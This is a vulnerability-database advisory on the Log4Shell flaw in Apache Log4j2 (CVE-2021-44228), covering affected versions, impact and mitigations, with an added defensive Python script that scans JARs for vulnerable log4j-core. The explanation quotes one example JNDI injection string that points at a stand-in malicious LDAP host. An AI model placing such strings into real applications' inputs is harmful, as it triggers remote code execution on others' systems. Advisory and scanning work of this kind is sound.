
Cloud Vulnerability DB
A community-led vulnerabilities database
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) contains a critical vulnerability (CVE-2021-44228) known as Log4Shell, discovered in December 2021. The vulnerability affects the JNDI features used in configuration, log messages, and parameters, which do not protect against attacker-controlled LDAP and other JNDI-related endpoints. This vulnerability earned a CVSS score of 10.0 (Critical) due to its ease of exploitation and potential for full remote code execution (FortiGuard Labs, NVD).
The vulnerability stems from Log4j's use of JNDI (Java Naming and Directory Interface), which allows the logging library to connect to external directory services such as LDAP. When message lookup substitution is enabled, an attacker can exploit this by placing a JNDI lookup in any request field that gets logged via Log4j, for example a value such as '${jndi:ldap://malicious-server.host/aaa}'. When the vulnerable Log4j version processes that message, it contacts the named server with an LDAP query, which can result in downloading and executing attacker-supplied Java class files (FortiGuard Labs).
The vulnerability allows attackers who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers. This can lead to full remote code execution on the target system, potentially giving attackers complete control over vulnerable systems. The widespread use of Log4j in enterprise applications and cloud services makes this vulnerability particularly severe, with millions of applications including iCloud, Steam, and Minecraft being potentially affected (FortiGuard Labs).
For Java 8 or later users, updating to Log4j 2.17.0 is recommended. For Java 7 users, upgrading to version 2.12.2 is advised. Alternative mitigations include setting the system property log4j2.formatMsgNoLookups to true or removing the JndiLookup class from the classpath. The vulnerability only impacts the log4j-core JAR file; applications using only the log4j-api JAR file without the log4j-core JAR file are not affected (FortiGuard Labs).
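The mitigations above reduce to three checks a defender can run against a host's JAR inventory: is the artifact log4j-core rather than log4j-api, is its version inside the affected range (2.0-beta9 through 2.15.0, minus the three security backports), and is the JndiLookup class still present in the archive. The script below is an added example, not code from the Wiz database or the Log4j project. It assumes the standard Maven metadata layout that log4j-core ships inside its JAR (META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties) and the class path org/apache/logging/log4j/core/lookup/JndiLookup.class; the sample JARs it builds in a temporary directory are constructed stubs so the scan can be exercised offline.

```python
"""Scan a directory tree for log4j-core JARs and report CVE-2021-44228 exposure.

Added example (not Wiz or Apache code). Assumes the standard Maven metadata
layout inside log4j-core JARs; the demo JARs are constructed stubs.
"""
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Class that performs the JNDI lookup; removing it from the JAR is the
# "remove the JndiLookup class from the classpath" mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core ships inside its JAR (log4j-api has its own path).
CORE_POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Security releases the CVE text excludes from the affected range.
SAFE_BACKPORTS = {"2.12.2", "2.12.3", "2.3.1"}


def version_in_affected_range(version: str) -> bool:
    """True for 2.0-beta9 through 2.15.0, excluding the security backports."""
    main, _, pre = version.partition("-")
    nums = tuple(int(p) for p in main.split("."))
    nums = nums + (0,) * (3 - len(nums))  # pad to major.minor.patch
    if nums[0] != 2:
        return False
    if pre:  # pre-release: only 2.0-beta9 and later betas are in range
        m = re.fullmatch(r"beta(\d+)", pre)
        return nums[:2] == (2, 0) and m is not None and int(m.group(1)) >= 9
    if version in SAFE_BACKPORTS:
        return False
    return nums <= (2, 15, 0)


@dataclass
class JarReport:
    path: str
    version: Optional[str]
    has_jndi_lookup: bool

    @property
    def vulnerable(self) -> bool:
        # Exposure needs both an affected version and the lookup class still present.
        return (self.has_jndi_lookup and self.version is not None
                and version_in_affected_range(self.version))


def inspect_jar(path: str) -> Optional[JarReport]:
    """Return a report for log4j-core JARs, None for anything else (e.g. log4j-api)."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if CORE_POM_PROPERTIES not in names:
            return None
        props = zf.read(CORE_POM_PROPERTIES).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        version = m.group(1).strip() if m else None
        return JarReport(path, version, JNDI_LOOKUP_CLASS in names)


def scan_tree(root: str) -> List[JarReport]:
    """Walk root and inspect every *.jar found."""
    reports = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                report = inspect_jar(os.path.join(dirpath, name))
                if report is not None:
                    reports.append(report)
    return reports


def make_sample_jar(path: str, version: str, include_jndi_lookup: bool,
                    artifact: str = "log4j-core") -> None:
    """Build a constructed stub JAR carrying only the metadata the scan reads."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(f"META-INF/maven/org.apache.logging.log4j/{artifact}/pom.properties",
                    f"version={version}\ngroupId=org.apache.logging.log4j\n"
                    f"artifactId={artifact}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # stub, not a real class


def demo(root: Optional[str] = None) -> Dict[str, bool]:
    """Build four constructed JARs and map each log4j-core file name to its verdict."""
    root = root or tempfile.mkdtemp(prefix="log4j-scan-")
    make_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
    make_sample_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
    make_sample_jar(os.path.join(root, "log4j-core-2.17.0.jar"), "2.17.0", True)
    make_sample_jar(os.path.join(root, "log4j-api-2.14.1.jar"), "2.14.1", False,
                    artifact="log4j-api")  # api-only: never reported
    return {os.path.basename(r.path): r.vulnerable for r in scan_tree(root)}


if __name__ == "__main__":
    for name, vulnerable in sorted(demo().items()):
        print(f"{name}: {'VULNERABLE' if vulnerable else 'ok'}")
```

Point scan_tree at an application's lib directory to get the same verdicts for real artifacts. Note that the scan only covers JARs sitting directly on disk; log4j-core nested inside a fat JAR or WAR needs the archive opened recursively, and the formatMsgNoLookups system property is a runtime setting the file scan cannot see.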
The severity of the vulnerability prompted SANS to move their Infocon alert to yellow for the first time since the WannaCry outbreak in 2017. This level of alert has only previously been elevated for severe incidents such as Heartbleed and Shellshock. The vulnerability received widespread attention from the security community and vendors, with major companies like Microsoft, Oracle, and Cisco releasing advisories and patches for their affected products (FortiGuard Labs).
Source: This report was generated using AI